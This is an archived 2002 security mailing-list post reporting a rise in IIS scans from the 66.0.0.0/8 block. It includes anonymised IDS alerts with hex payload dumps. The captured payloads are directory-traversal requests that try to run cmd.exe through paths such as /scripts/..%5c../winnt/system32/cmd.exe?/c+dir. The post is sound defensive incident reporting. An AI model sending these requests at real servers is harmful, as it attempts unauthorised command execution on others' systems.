Increased IIS scans mainly on 66.0.0.0/8

From: Richard Gilman (Richard.Gilmanat_private)
Date: Wed Aug 14 2002 - 09:22:49 PDT

  • Next message: H C: "RE: Subseven Scans" 

    Has anyone noticed an increase in scans trying old IIS redirect exploits? It doesn't appear to be RedCode or nimda IMHO, just various attempts to redirect and run cmd.exe?dir. In the last month we have noticed a large increase in this activity 94% of which originates from the 66.0.0.0/8 block (448 sources and only 31 not from 66/8). There are 4 sources originating from fuse.net that are particularly heavy hitters 33,000 hits out of a total of 47,000 hits. I am only seeing it on our 66.0.0.0/8 network so far. Looks like a new worm possibly or 448 kiddie clones? The sources all seem to use the same set of cmd.exe attempts as in the obfuscated logs below.
 
#(5 - 53409) [2002-07-17 10:40:25]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
hlen=5 TOS=0 dlen=136 ID=45497 flags=0 offset=0 TTL=112 chksum=11558
TCP:  port=1815 -> dport: 80  flags=***AP*** seq=2441649372
ack=441678925 off=5 res=0 win=16560 urp=0 chksum=12602
Payload:  length = 94
 
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   2f../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
------------------------------------------------------------------------------
 
#(5 - 53408) [2002-07-17 10:40:25]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
hlen=5 TOS=0 dlen=140 ID=45378 flags=0 offset=0 TTL=112 chksum=11673
TCP:  port=1626 -> dport: 80  flags=***AP*** seq=2431763146
ack=975791510 off=5 res=0 win=16560 urp=0 chksum=42327
Payload:  length = 94
 
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E   ir c+dir HTTP/1.
040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F   0..Host: www..Co
050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F         nnnection: clo
------------------------------------------------------------------------------
 
#(5 - 53407) [2002-07-17 10:40:21]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
hlen=5 TOS=0 dlen=136 ID=44586 flags=0 offset=0 TTL=112 chksum=12469
TCP:  port=1429 -> dport: 80  flags=***AP*** seq=2421845072
ack=4293161072 off=5 res=0 win=16560 urp=0 chksum=38086
Payload:  length = 94
 
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
------------------------------------------------------------------------------
 
#(5 - 53406) [2002-07-17 10:40:19]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
hlen=5 TOS=0 dlen=120 ID=44322 flags=0 offset=0 TTL=112 chksum=12749
TCP:  port=3898 -> dport: 80  flags=***AP**F seq=2161495310
ack=1433176482 off=5 res=0 win=16560 urp=0 chksum=62138
Payload:  length = 80
 
000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73   GET /d/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A   ction: close....
------------------------------------------------------------------------------
 
#(5 - 53405) [2002-07-17 10:40:17]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
hlen=5 TOS=0 dlen=138 ID=43768 flags=0 offset=0 TTL=112 chksum=13285
TCP:  port=1395 -> dport: 80  flags=***AP*** seq=2420235203
ack=934140878 off=5 res=0 win=16560 urp=0 chksum=19568
Payload:  length = 94
 
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D   ir dir HTTP/1.0.
040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E   .Host: www..Conn
050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65         nection: close
------------------------------------------------------------------------------
 
#(5 - 53404) [2002-07-17 10:40:16]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
hlen=5 TOS=0 dlen=137 ID=43638 flags=0 offset=0 TTL=112 chksum=13416
TCP:  port=1366 -> dport: 80  flags=***AP*** seq=2418722397
ack=4180274008 off=5 res=0 win=16560 urp=0 chksum=17941
Payload:  length = 93
 
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   r dir HTTP/1.0..
040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E   Host: www..Connn
050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65            ection: close
------------------------------------------------------------------------------
 
#(5 - 53403) [2002-07-17 10:40:16]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
hlen=5 TOS=0 dlen=137 ID=43512 flags=0 offset=0 TTL=112 chksum=13542
TCP:  port=1162 -> dport: 80  flags=***AP*** seq=2408265220
ack=4037057826 off=5 res=0 win=16560 urp=0 chksum=11122
Payload:  length = 93
 
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   r dir HTTP/1.0..
040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E   Host: www..Connn
050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65            ection: close
 
Rich

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

    This archive was generated by hypermail 2b30 : Wed Aug 14 2002 - 12:47:13 PDT